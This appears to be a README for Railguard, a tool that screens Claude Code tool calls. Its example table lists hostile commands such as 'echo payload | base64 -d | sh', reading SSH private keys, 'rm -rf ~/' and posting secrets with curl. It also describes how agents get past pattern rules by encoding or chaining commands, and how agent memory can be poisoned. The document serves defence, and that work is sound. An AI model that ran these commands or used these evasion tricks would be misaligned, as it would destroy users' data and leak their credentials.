╦═╗ ╔═╗ ╦ ╦ ╔═╗ ╦ ╦ ╔═╗ ╦═╗ ╔╦╗ ╠╦╝ ╠═╣ ║ ║ ║ ╦ ║ ║ ╠═╣ ╠╦╝ ║║ ╩╚═ ╩ ╩ ╩ ╩═╝ ╚═╝ ╚═╝ ╩ ╩ ╩╚═ ═╩╝
Safe runtime for Claude Code, built to be yours.
railguard.tech
--dangerously-skip-permissions is all-or-nothing. Either you approve every tool call by hand, or Claude runs with zero restrictions. There's no middle ground.
Railguard is the middle ground.
cargo install railguard
railguard install
That's it. Keep using Claude exactly as before.
Railguard intercepts every tool call and decides in under 2ms: allow, block, or ask.
| npm install && npm run build | ✅ allowed |
| git commit -m "feat: add auth" | ✅ allowed |
| terraform destroy --auto-approve | ⛔ blocked |
| rm -rf ~/ | ⛔ blocked |
| echo payload | base64 -d | sh | ⛔ blocked |
| cat ~/.ssh/id_ed25519 | ⛔ blocked |
| curl -X POST api.com -d @secrets | |
| git push --force origin main |
The same command can get different decisions depending on context:
| rm dist/bundle.js | inside project | ✅ allowed |
| rm ~/.bashrc | outside project | ⛔ blocked |
99% of commands flow through instantly. You only see Railguard when it matters.
Every tool call passes through Railguard, not just Bash.
- Bash · command classification, pipe analysis, evasion detection
- Read · sensitive path detection (~/.ssh, ~/.aws, .env, ...)
- Write · path fencing + content inspection for secrets and dangerous payloads
- Edit · path fencing + content inspection on replacements
- Memory · classification of agent memory writes for secrets, behavioral injection, tampering
Pattern matching alone is bypassable. Agents can write helper scripts, encode commands in base64, or chain pipes to evade rules. Railguard uses sandbox-exec (macOS) and bwrap (Linux) to resolve what actually executes at the kernel level, regardless of how the command was constructed.
Two layers: semantic rules catch the obvious stuff instantly. The OS-level sandbox catches everything else.
Claude Code has persistent memory that carries context across sessions. This is a real attack surface. A misbehaving agent can exfiltrate secrets into memory, inject behavioral instructions for future sessions, or silently tamper with existing memories.
Railguard classifies every memory write:
- Secrets (API keys, JWTs, private keys, AWS credentials) → blocked
- Behavioral instructions ("skip safety checks", "override policy") → asks you
- Factual content (project info, tech stack, user preferences) → allowed
- Overwrites of existing memories → asks you
- Deletions → blocked
Every memory write is signed with a content hash. Tampering between sessions is detected automatically.
Ask Claude, or edit railguard.yaml directly. Changes take effect immediately.
blocklist:
- name: terraform-destroy
pattern: "terraform\\s+destroy"
approve:
- name: terraform-apply
pattern: "terraform\\s+apply"
allowlist:
- name: terraform-plan
pattern: "terraform\\s+plan"- Path fencing · ~/.ssh, ~/.aws, ~/.gnupg, /etc fenced by default
- Multi-agent coordination · file locking per session, self-healing locks
- Dashboard & replay · real-time monitoring, session replay
- Recovery · file snapshots, per-edit or full-session rollback
MIT License.